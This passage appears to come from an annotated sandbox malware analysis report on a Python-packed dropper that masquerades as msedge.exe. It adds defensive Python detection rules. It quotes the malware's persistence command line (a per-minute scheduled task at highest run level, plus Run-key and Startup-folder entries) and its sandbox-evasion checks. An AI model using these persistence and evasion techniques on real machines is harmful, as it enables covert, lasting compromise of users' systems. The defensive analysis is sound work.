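    return -sum((c / n) * math.log2(c / n) for c in Counter(text).values())


def method_name_entropy(names) -> float:
    """Entropy of all method names of one type joined together, as the heuristic measures it."""
    return shannon_entropy("".join(names))


def looks_obfuscated(names, threshold: float = 5.0, min_chars: int = 64) -> bool:
    """True when the joined names are long enough to judge and exceed the threshold.

    threshold and min_chars are illustrative assumptions, not Joe Sandbox's cut-offs.
    Obfuscator output is near-uniform over 62 symbols, so it approaches
    log2(62) ~= 5.95 bits/char; a handful of English-like names cannot reach 5.
    """
    joined = "".join(names)
    return len(joined) >= min_chars and shannon_entropy(joined) >= threshold


def names_from_report_line(line: str):
    """Extract the quoted method names from one 'High entropy of concatenated method names' line."""
    _, _, tail = line.partition("method names:")
    return _QUOTED.findall(tail)


if __name__ == "__main__":
    for label, names in (("obfuscated", OBFUSCATED_METHODS), ("normal", NORMAL_METHODS)):
        print(f"{label:10s} {method_name_entropy(names):.2f} bits/char "
              f"flagged={looks_obfuscated(names)}")
```

Two caveats when reusing this as a triage check: very short types (a few one-letter names) give unstable entropy, which is why a minimum length is enforced; and a type that mixes compiler-generated names (Equals, GetHashCode, Create__Instance__) with renamed ones, as the Aa9DO6wW class above does, still scores high because the long random names dominate the joined string.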

                      Persistence and Installation Behavior

                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | Process created: "C:\Users\user\Desktop\YgJ5inWPQO.exe"
                      Source: C:\Windows\System32\cmd.exe | Process created: attrib.exe (4 occurrences)
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\ipconfig.exe ipconfig /all
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pyd
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\dddd.exe
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pyd
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\select.pyd
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pyd
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\VCRUNTIME140.dll
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pyd
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\msedge.exe
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pyd
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | File created: C:\Users\user\AppData\Roaming\System User.exe
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exe | File created: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pyd
                      Note: _MEI4322 is the runtime extraction directory of a PyInstaller one-file bundle; python313.dll, the *.pyd modules, libcrypto-3.dll and VCRUNTIME140.dll are the bundled Python 3.13 runtime, not payloads. The payloads are the two executables written directly to Temp, dddd.exe and msedge.exe (the latter borrows the file name of Microsoft Edge's browser binary, which never lives under a user's Temp directory), and msedge.exe in turn writes the persistent copy System User.exe to Roaming.

                      Boot Survival

                      Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process created: C:\Windows\System32\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk (2 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\System User (2 occurrences)
                      Note: the same payload path is registered three times over: a scheduled task "System User" that re-launches C:\Users\user\AppData\Roaming\System User.exe every minute (so the RAT restarts within a minute of being killed) with /RL HIGHEST requesting the highest run level available to the registering account, a shortcut in the per-user Startup folder, and an HKCU Run value. All three are user-writable, no elevation is needed to create them, and cleanup has to remove all three or the payload comes back.
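Added example, not part of the Joe Sandbox report: a small Python rule set that flags the three persistence paths listed under Boot Survival (per-minute scheduled task with /RL HIGHEST and a target under AppData, Startup-folder .lnk, HKCU Run value) and, from the Persistence and Installation items, an executable dropped into Temp under a well-known browser name. It runs over constructed events normalized from the report lines; the event schema, rule names, the five-minute trigger cut-off and the MASQUERADE_NAMES list are assumptions for illustration, and the Run value's data is not shown in the report and is assumed to be the task's target path.

```python
import re
from dataclasses import dataclass

# Path and key patterns behind the rules. HKCU Run/RunOnce and the per-user Startup
# folder are the autostart locations seen in the report; the scheduled task is the third.
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.IGNORECASE)
STARTUP_DIR = re.compile(r"\\Start Menu\\Programs\\Startup\\", re.IGNORECASE)
TEMP_DIR = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
RUN_KEY = re.compile(r"\\Microsoft\\Windows\\CurrentVersion\\Run(Once)?$", re.IGNORECASE)
# Legitimate binary names a dropper may borrow (constructed list; msedge.exe is the one seen here).
MASQUERADE_NAMES = {"msedge.exe", "chrome.exe", "svchost.exe", "explorer.exe"}


@dataclass(frozen=True)
class Finding:
    rule: str
    evidence: str


def schtasks_arg(cmdline: str, flag: str):
    """Value following /<flag> on a schtasks command line (quotes stripped), or None."""
    m = re.search(r'(?i)\s/' + flag + r'\s+("[^"]*"|\S+)', cmdline)
    return m.group(1).strip('"') if m else None


def check_schtasks(cmdline: str):
    """Flag schtasks /create with a per-minute trigger, highest run level or a user-writable target."""
    if not re.search(r"(?i)\bschtasks\b.*\s/create\b", cmdline):
        return []
    findings = []
    sc = (schtasks_arg(cmdline, "sc") or "").lower()
    mo = schtasks_arg(cmdline, "mo") or ""
    rl = (schtasks_arg(cmdline, "rl") or "").lower()
    tr = schtasks_arg(cmdline, "tr") or ""
    if sc == "minute" and mo.isdigit() and int(mo) <= 5:  # 5-minute cut-off is an assumption
        findings.append(Finding("schtasks_minute_trigger", f"/sc {sc} /mo {mo}"))
    if rl == "highest":
        findings.append(Finding("schtasks_highest_runlevel", "/RL HIGHEST"))
    if USER_WRITABLE.search(tr):
        findings.append(Finding("schtasks_user_writable_target", tr))
    return findings


def check_event(ev: dict):
    """Apply the rules to one normalized event (the schema is an assumption for this example)."""
    kind = ev["type"]
    if kind == "process_create":
        return check_schtasks(ev["cmdline"])
    if kind == "registry_set":
        if RUN_KEY.search(ev["key"]) and USER_WRITABLE.search(ev.get("data", "")):
            return [Finding("run_key_user_writable", f"{ev['key']}\\{ev['value']} = {ev['data']}")]
        return []
    if kind == "file_create":
        path = ev["path"]
        name = path.rsplit("\\", 1)[-1].lower()
        out = []
        if STARTUP_DIR.search(path) and name.endswith(".lnk"):
            out.append(Finding("startup_folder_lnk", path))
        if TEMP_DIR.search(path) and name in MASQUERADE_NAMES:
            out.append(Finding("masquerading_binary_in_temp", path))
        return out
    return []


def scan(events):
    """Run every event through the rules and return all findings in order."""
    findings = []
    for ev in events:
        findings.extend(check_event(ev))
    return findings


# Constructed events normalized from the report's Boot Survival and Persistence items.
# The Run value's data is not shown in the report; the task target is assumed.
SAMPLE_EVENTS = [
    {"type": "process_create", "image": r"C:\Users\user\AppData\Local\Temp\msedge.exe",
     "cmdline": r'"C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 '
                r'/tn "System User" /tr "C:\Users\user\AppData\Roaming\System User.exe"'},
    {"type": "registry_set", "key": r"HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "value": "System User", "data": r"C:\Users\user\AppData\Roaming\System User.exe"},
    {"type": "file_create",
     "path": r"C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\System User.lnk"},
    {"type": "file_create", "path": r"C:\Users\user\AppData\Local\Temp\msedge.exe"},
    # Runtime file from the same dropper: in Temp, but not a masqueraded name, so no finding.
    {"type": "file_create", "path": r"C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dll"},
    # Benign control: a daily task pointing at Program Files must not fire any rule.
    {"type": "process_create", "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r'schtasks /create /sc daily /st 03:00 /tn "Backup" /tr "C:\Program Files\Backup\backup.exe"'},
]

if __name__ == "__main__":
    for f in scan(SAMPLE_EVENTS):
        print(f"{f.rule:32s} {f.evidence}")
```

The schtasks rule scores the three suspicious switches separately rather than requiring all of them, because each is a distinct signal: a per-minute trigger is a watchdog pattern, /RL HIGHEST is rarely needed by user software, and a task target under AppData is the tell for a user-level drop. The benign daily backup task in the sample shows that a plain /create alone produces nothing.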

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 (16 occurrences)
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 (12 occurrences)
                      Note: PowerShell also opens module manifests under Modules\ during command auto-discovery, so these opens show that the BitLocker module was enumerated or imported, not that any BitLocker cmdlet ran. Check the script block and command-line logs of the same powershell.exe instances for BitLocker cmdlets before treating this as disk-encryption activity; in this sample the logged PowerShell commands are the Defender exclusion and execution-policy bypass listed in the signatures.
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCode function: 0_2_00007FF7FF585820 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF7FF585820
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                      Note: crypt32 registers change notifications on the SystemCertificates\AuthRoot keys whenever a process opens the system root store, for example to validate a TLS server certificate, so these two items are expected from any TLS client and are not evidence of certificate-store tampering on their own.
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Process information set: NOOPENFILEERRORBOX (56 occurrences)
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                      Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX

                      Malware Analysis System Evasion

                      Source: Yara match | File source: 2.3.YgJ5inWPQO.exe.1d8a96bd23f.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: YgJ5inWPQO.exe PID: 5352, type: MEMORYSTR
                      Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1 | Host: ip-api.com | Connection: Keep-Alive
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                      Source: YgJ5inWPQO.exe, 00000002.00000003.1479245702.000001D8A966B000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477560662.000001D8A96BD000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1485033909.000001D8A9686000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000002.1495329200.000001D8A969D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1477753556.000001D8A9689000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486802746.000001D8A968D000.00000004.00000020.00020000.00000000.sdmp, YgJ5inWPQO.exe, 00000002.00000003.1486429771.000001D8A9688000.00000004.00000020.00020000.00000000.sdmp, msedge.exe, 0000000C.00000000.1480505898.00000000003D2000.00000002.00000001.01000000.00000008.sdmp, msedge.exe, 0000000C.00000002.2742589628.0000000002601000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Memory allocated: B10000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Memory allocated: 1A600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Memory allocated: 26232600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Memory allocated: 2624C050000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1190000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1AE60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: F70000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1AD60000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1600000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1B100000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 2BA0000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Roaming\System User.exe | Memory allocated: 1AE00000 memory reserve | memory write watch
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 600000
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599804
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599683
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599578
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599468
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599354
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599234
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599125
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 599015
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598906
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598742
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598632
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598515
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598406
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598295
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe | Thread delayed: delay time: 598187
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 598078Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597949Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597844Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597578Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 597176Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596916Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596764Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596647Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596510Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596400Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596168Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 596062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595952Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595843Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595734Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595619Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595511Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595171Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594951Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594799Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594672Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594323Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 594075Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593969Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593859Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593749Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593640Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593531Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593418Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593306Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593187Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeThread delayed: delay time: 593059Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Roaming\System User.exeThread delayed: delay time: 922337203685477
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWindow / User API: threadDelayed 754Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exeWindow / User API: threadDelayed 9065Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeWindow / User API: threadDelayed 5209Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exeWindow / User API: threadDelayed 4607Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7148Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2450Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6917
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2630
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6105
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3623
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7242
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2491
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_socket.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\libcrypto-3.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_lzma.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\select.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\unicodedata.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\python313.dllJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_hashlib.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_decimal.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI4322\_bz2.pydJump to dropped file
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_0-17567
                      Source: C:\Users\user\Desktop\YgJ5inWPQO.exeAPI coverage: 3.2 %
                      Source: C:\Users\user\AppData\Local\Temp\msedge.exe TID: 7880Thread sleep time: -36893488147419080s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -32281802128991695s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599804s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599683s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599468s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599354s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599234s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599125s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -599015s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598906s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598742s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598632s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598515s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598406s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598295s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598187s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -598078s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597949s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597844s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597734s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597578s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -597176s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596916s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596764s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596647s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596510s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596400s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596281s >= -30000sJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\dddd.exe TID: 3160Thread sleep time: -596168s >= -30000sJump to behavior
